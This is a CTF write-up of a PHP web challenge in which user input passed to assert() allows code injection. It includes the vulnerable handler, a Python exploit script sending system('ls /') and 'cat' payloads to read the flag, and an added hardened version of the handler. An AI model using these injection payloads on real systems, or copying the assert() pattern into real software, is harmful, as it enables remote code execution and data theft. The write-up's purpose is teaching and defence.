Web - Journal
100 points | 518 solves
Description
dear diary, there is no LFI in this app
Downloads
Solution
The provided PHP file:
<?php
echo "<p>Welcome to my journal app!</p>";
echo "<p><a href=/?file=file1.txt>file1.txt</a></p>";
echo "<p><a href=/?file=file2.txt>file2.txt</a></p>";
echo "<p><a href=/?file=file3.txt>file3.txt</a></p>";
echo "<p><a href=/?file=file4.txt>file4.txt</a></p>";
echo "<p><a href=/?file=file5.txt>file5.txt</a></p>";
echo "<p>";
if (isset($_GET['file'])) {
    $file = $_GET['file'];
    $filepath = './files/' . $file;
    assert("strpos('$file', '..') === false") or die("Invalid file!");
    if (file_exists($filepath)) {
        include($filepath);
    } else {
        echo 'File not found!';
    }
}
echo "</p>";

It's a simple enough challenge that looks like your typical LFI, but like the description says, this is not an LFI challenge.
As it turns out, when assert() is given a string it evaluates that string as PHP code, so it basically works like eval(), and we all know the horrors of eval. Here the user-controlled $file is interpolated between single quotes into the string passed to assert(), so a value containing a single quote breaks out of the string literal and is evaluated as code. This page on HackTricks explains it all.

It is also worth noting from the provided Dockerfile that the flag file name has random characters appended to it, which hinted that RCE was needed to find and read it.

Final solution:
import requests
import urllib.parse
payload = urllib.parse.quote_plus("'.die(system('ls /')).'")
print(requests.get("http://journal.chal.imaginaryctf.org/?file="+payload).text)
payload = urllib.parse.quote_plus("'.die(system('cat /flag-cARdaInFg6dD10uWQQgm.txt')).'")
print(requests.get("http://journal.chal.imaginaryctf.org/?file="+payload).text)

Flag: ictf{assertion_failed_e3106922feb13b10}
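
A hardened form of the handler from the provided PHP file, as an added example that is not part of the challenge or the original writeup. It assumes the entries are plain-text files named like file1.txt in ./files; the function name resolve_journal_file is hypothetical.

```php
<?php
// Added example, not the challenge author's code.
// The original passed a string built from $_GET['file'] to assert(); before
// PHP 8.0 a string argument to assert() is evaluated as code. Here the input
// is validated with ordinary control flow and never reaches assert(),
// eval() or include().

// Hypothetical helper: returns the canonical path of an allowed entry, or null.
function resolve_journal_file(string $name, string $baseDir): ?string
{
    // Allowlist the name: letters, digits, "_" and "-", ending in ".txt".
    // Quotes, slashes and ".." cannot match.
    if (!preg_match('/\A[A-Za-z0-9_-]+\.txt\z/', $name)) {
        return null;
    }

    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }

    // realpath() resolves symlinks and relative parts; the result must be
    // a regular file that sits directly inside the base directory.
    $path = realpath($base . DIRECTORY_SEPARATOR . $name);
    if ($path === false || !is_file($path) || dirname($path) !== $base) {
        return null;
    }
    return $path;
}

echo "<p>Welcome to my journal app!</p>";
echo "<p>";
if (isset($_GET['file']) && is_string($_GET['file'])) {
    $path = resolve_journal_file($_GET['file'], __DIR__ . '/files');
    if ($path === null) {
        echo 'File not found!';
    } else {
        // Treat the entry as data: read it and HTML-escape it, instead of
        // include(), which would execute any PHP the file contains.
        echo htmlspecialchars((string) file_get_contents($path), ENT_QUOTES, 'UTF-8');
    }
}
echo "</p>";
```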